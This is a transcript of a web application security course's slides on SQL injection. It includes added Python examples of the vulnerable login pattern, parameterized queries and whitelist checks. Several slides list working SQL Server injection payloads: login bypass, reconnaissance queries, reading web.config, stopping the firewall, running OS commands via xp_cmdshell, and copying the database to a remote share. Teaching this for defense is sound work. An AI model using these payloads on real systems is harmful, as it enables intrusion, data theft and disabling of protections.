A1 Injection Flaws Problem and Protection

Part of the Web Application Security Course

Transcript of 21 a1 injection flaws.pptx

Page 1: 21 a1 injection flaws.pptx

A1 Injection Flaws

Problem and Protection

Page 2: 21 a1 injection flaws.pptx

Little Bobby Tables

update students set (name) = (' _____ ') where studentID = 33342;

Page 3: 21 a1 injection flaws.pptx

Injection Flaws

o  SQL injection occurs when an attacker forces SQL statements into the HTTP request in such a way that those statements are run against the database

Page 4: 21 a1 injection flaws.pptx

How attackers do it

1.  They find a vulnerable site

2.  They type SQL statements into text boxes or URLs, or inject them into other form fields using a request manipulator like Fiddler

Page 5: 21 a1 injection flaws.pptx

How attackers do it

o  The attacker's injection may look like this:

   12; update orders set amtDue=0 where orderID=1234; --

o  And the code that runs it might look like this:

   string sql = "SELECT catID FROM items WHERE prodID = " + txtProdID.Text;
   var cmd = new SqlCommand(sql, myConn);
   var categoryID = cmd.ExecuteScalar();

o  So the resulting SQL that runs would look like this:

   select catID from items where prodID = 12; update orders set amtDue=0 where orderID=1234;

Page 6: 21 a1 injection flaws.pptx

How to break in without a password

o  Scenario: textboxes for username/password

o  Injection: admin' OR 1=1--

o  Resulting SQL: select userID from user where username = 'admin' OR 1=1 --' and password = '';

Page 7: 21 a1 injection flaws.pptx

How to gather intel about the installation

SQL attack vector                          Data gathered
0; select @@version; --                    Database version
0; select @@servername; --                 Actual server name
0; select @@microsoftversion; --           OS name and version
0; select * from master..sysservers; --    List of other servers
0; select * from sysusers; --              All user accounts

Page 8: 21 a1 injection flaws.pptx

How to get a list of tables

0; SELECT so.name, MAX(si.rows) AS numrows
   FROM sys.sysobjects AS so
   INNER JOIN sys.sysindexes AS si ON OBJECT_ID(so.name) = si.id
   WHERE (so.xtype = 'U')
   GROUP BY so.name; --

name                  numrows
Employees             9
EmployeeTerritories   49
OrderDetails          2155
OrderPayment          1
Orders                830
Products              77
Region                4
Shipment              1
Shippers              3

Page 9: 21 a1 injection flaws.pptx

How to get a table's structure

0; exec sp_columns refundsToProcess; --

Page 10: 21 a1 injection flaws.pptx

How to set a value in a table

0; insert into refundsToProcess (amount, custID, approved) values (932.45, 11234, true); --

Page 11: 21 a1 injection flaws.pptx

How to read files from the hard drives or network

0; create table myfile (line varchar(8000)); bulk insert myfile from 'c:\inetpub\wwwroot\web.config'; select * from myfile; --

Page 12: 21 a1 injection flaws.pptx

How to start and stop OS Services

0; EXEC xp_servicecontrol stop Firewall; --

0; EXEC xp_servicecontrol start telnet; --

Page 13: 21 a1 injection flaws.pptx

How to run OS commands

0; exec master..xp_cmdshell 'reg.exe ADD HKLM\Software\HackersAreUs /v NoAuth /t REG_BINARY /d 0001 '; --

Page 14: 21 a1 injection flaws.pptx

How to steal the whole doggone database!

0; backup database master to disks='\\{IP}\{sharename}\backupdb.dat'; --

Page 15: 21 a1 injection flaws.pptx

How to vacation offshore after pwning us

Page 16: 21 a1 injection flaws.pptx

How we protect ourselves

o  Use parameterized statements

o  Use stored procedures

o  Enforce least privilege

o  Validate the input via whitelist

Page 17: 21 a1 injection flaws.pptx

Use parameterized statements

o  Single best thing to do

o  All other methods can help

o  Only this one will halt the attack by itself

o  It's the parameters that fix the issue

Page 18: 21 a1 injection flaws.pptx

Use parameterized queries

   var cmd = new SqlCommand("select count(*) from users where userID = @userID and pwd = @pwd", myConn);
   cmd.Parameters.Add(new SqlParameter("@userID", SqlDbType.NVarChar, 10));
   cmd.Parameters["@userID"].Value = txtUserID.Text;
   cmd.Parameters.Add(new SqlParameter("@pwd", SqlDbType.NVarChar, 128));
   cmd.Parameters["@pwd"].Value = txtPassword.Text;
   if (Convert.ToInt16(cmd.ExecuteScalar()) == 0)
       throw new Exception("No dice, chief.");
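The login scenario from slide 6 and the parameterized fix from slide 18, as an added Python/sqlite3 example (not the course's C# code; the users table, its rows and the function names are constructed). It runs the slide's "admin' OR 1=1--" input through both query styles so the difference is observable.

```python
import sqlite3

# Constructed sample rows standing in for the slide's user table.
# Plaintext passwords only because the slide's query compares pwd directly;
# a real system stores password hashes.
SAMPLE_USERS = [(1, "admin", "hunter2"), (2, "alice", "s3cret")]


def setup_db():
    """Create an in-memory SQLite database holding the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userID INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_concatenated(conn, username, password):
    """The slide's vulnerable pattern: SQL assembled by string concatenation.

    With the slide's input the quote closes the literal and '--' comments out
    the password check, so the WHERE clause collapses to 'OR 1=1'.
    """
    sql = ("select userID from users where username = '" + username +
           "' and password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Same query with placeholders: the driver binds the input as data, so
    the quote and '--' are just characters in a username that does not exist."""
    sql = "select userID from users where username = ? and password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = setup_db()
    injected = "admin' OR 1=1--"  # the input from slide 6
    print(login_concatenated(db, injected, ""))       # [1, 2]: every user returned
    print(login_parameterized(db, injected, ""))      # []: no match, attack halted
    print(login_parameterized(db, "alice", "s3cret"))  # [2]: normal login still works
```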

Page 19: 21 a1 injection flaws.pptx

ORMs and injection attacks

o  ORMs like
   •  NHibernate
   •  LINQ
   •  Entity Framework

o  They use parameterized queries natively

o  So use an ORM and you're all set!

Page 20: 21 a1 injection flaws.pptx

Use stored procedures

o  Stored procedures make it tougher for attackers to inject SQL because procedures are by definition limited to certain activities

   CREATE procedure OrderItem(
       @CustomerID nchar(5),
       @ProductID int,
       @Quantity int,
       @OrderID int OUT
   ) as
   declare @UnitPrice money
   -- First, get Unit Price for the Item sold
   set @UnitPrice = (select UnitPrice from Products where ProductID = @ProductID);
   -- Create the order header and get the orderID
   insert into Orders (CustomerID, OrderDate, RequiredDate, ShipVia)
       values (@CustomerID, getdate(), DateAdd(Day, 7, getdate()), 3);
   set @OrderID = @@IDENTITY;
   -- Add Order Detail Row
   insert into [Order Details] (OrderID, ProductID, UnitPrice, Quantity)
       values (@OrderID, @ProductID, @UnitPrice, @Quantity);
   go

Page 21: 21 a1 injection flaws.pptx

Stored procedures can be vulnerable

o  Example:

   alter procedure DoGenericQuery
       @query nvarchar(255)
   as
       exec sp_executesql @query
   go

o  This would run ANY other query

o  Stay vigilant with procedures

Page 22: 21 a1 injection flaws.pptx

Enforce least privilege

o  For all RDBMS activities, use DB users vs. Windows users

o  For that DB user, remove all privileges (read, write, modify, grant, deny) on every entity (table, view, procedure, function) until it can be proven that the user needs that privilege

o  Basically, whitelist privileges instead of blacklisting them

o  If this user needs to read X columns from a table, create a view with only those X columns. Grant the privilege on that view and deny it on the table

Page 23: 21 a1 injection flaws.pptx

Validate data via a whitelist

o  Test the data being input to make sure that it matches a pattern

o  If it doesn't match a pattern, we reject it via a graceful error message

o  Pattern = RegEx (___________ _________)

Page 24: 21 a1 injection flaws.pptx

Why not a blacklist?

o  You cannot possibly predict all of the possible ways that an attacker will get around our filter

o  As in most things in life, where there are only a couple of ways to get something right, there are a near infinite number of ways to do it wrong

Page 25: 21 a1 injection flaws.pptx

Why not a blacklist?

o  Example:

o  You blacklist single quotes and semicolons

o  Attacker simply types in ...

   pass concat(char(39), char(32), char(111), char(114), char(32), char(49), char(61), char(49))

o  which is ...

   pass' or 1=1

Page 26: 21 a1 injection flaws.pptx

How to whitelist

o  Specify only the patterns that you will allow

Description                                                      Regular Expression
Safe text. Letters, numbers, whitespace, dots, & dashes only.    ^[a-zA-Z0-9\s.\-]+$
Social Security number                                           ^\d{3}-\d{2}-\d{4}$
One of the 50 states                                             ^(AL|AK|AZ|AR|CA|CO|...|TX|UT|VA|WA|WV|WI|WY)$
US telephone number                                              ^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$
Credit card number                                               ^((4\d{3})|(5[1-5]\d{2})|(6011)|(7\d{3}))-?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$

Page 27: 21 a1 injection flaws.pptx

How to whitelist

   string whitelist = @"^\d{3}-\d{2}-\d{4}$";
   if (!new Regex(whitelist).IsMatch(txtSSN.Text))
       throw new Exception("Quit that hacking!");

o  Note the @-sign. Needed because ______
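The blacklist bypass from slide 25 and the whitelist patterns from slides 26 and 27, as an added Python example (not the course's C# code; the function names and sample inputs are constructed). It also shows the check a practitioner adds on top of the slide: a full-string match, because "$" alone still accepts a trailing newline.

```python
import re

# Whitelist patterns copied from the slide's table (the 50-state pattern is
# abbreviated with "..." on the slide, so it is left out here).
WHITELISTS = {
    "safe_text": r"^[a-zA-Z0-9\s.\-]+$",
    "ssn": r"^\d{3}-\d{2}-\d{4}$",
    "us_phone": r"^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$",
}

# The blacklist from the "Why not a blacklist?" slide: quotes and semicolons.
BLACKLIST_CHARS = {"'", ";"}

# The slide's bypass input: contains neither character, yet SQL Server's
# concat/char() would evaluate it to "pass' or 1=1".
CONCAT_PAYLOAD = ("pass concat(char(39), char(32), char(111), char(114), "
                  "char(32), char(49), char(61), char(49))")


def blacklist_allows(value):
    """True when the input contains none of the blacklisted characters."""
    return not any(c in BLACKLIST_CHARS for c in value)


def whitelist_allows(kind, value):
    """True only when the entire input matches the named whitelist pattern.

    re.fullmatch is used rather than re.match/re.search so that a trailing
    newline cannot slip past '$' (in both .NET and Python, '$' also matches
    just before a final newline).
    """
    return re.fullmatch(WHITELISTS[kind], value) is not None


if __name__ == "__main__":
    print(blacklist_allows(CONCAT_PAYLOAD))              # True: blacklist is bypassed
    print(whitelist_allows("safe_text", CONCAT_PAYLOAD))  # False: parens and commas not allowed
    print(whitelist_allows("ssn", "123-45-6789"))         # True
    print(whitelist_allows("ssn", "123-45-6789\n"))       # False: fullmatch rejects the newline
    print(whitelist_allows("us_phone", "(555) 123-4567"))  # True
```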

Page 28: 21 a1 injection flaws.pptx

Summary

o  If the opportunity to inject SQL into our pages is present, attackers can inflict extremely serious and irreparable harm on our organization

o  This is the top-rated web vulnerability known to man

o  It can be mitigated by:
   •  Whitelisting user input
   •  Using stored procedures
   •  Enforcing least privilege
   •  Using parameterized statements

Page 29: 21 a1 injection flaws.pptx

p.s. Not just SQL Injections

o  Injection attack vectors include:
   •  OS commands
   •  HTML injections
   •  LDAP injections
   •  XML/XPath/XSLT

o  The solutions are the same as for SQL, though

Page 30: 21 a1 injection flaws.pptx

Further study

o  Pocket guide to web security:
   •  http://amzn.to/PocketGuideWebSecurity

o  Very thorough reference on injection attacks:
   •  http://bit.ly/InjectionAttackReference

o  Tricks on overcoming blacklist filters:
   •  http://bit.ly/OvercomingBlacklists

o  List of SQL injection attack vectors:
   •  http://bit.ly/SQLInjectionCheatSheet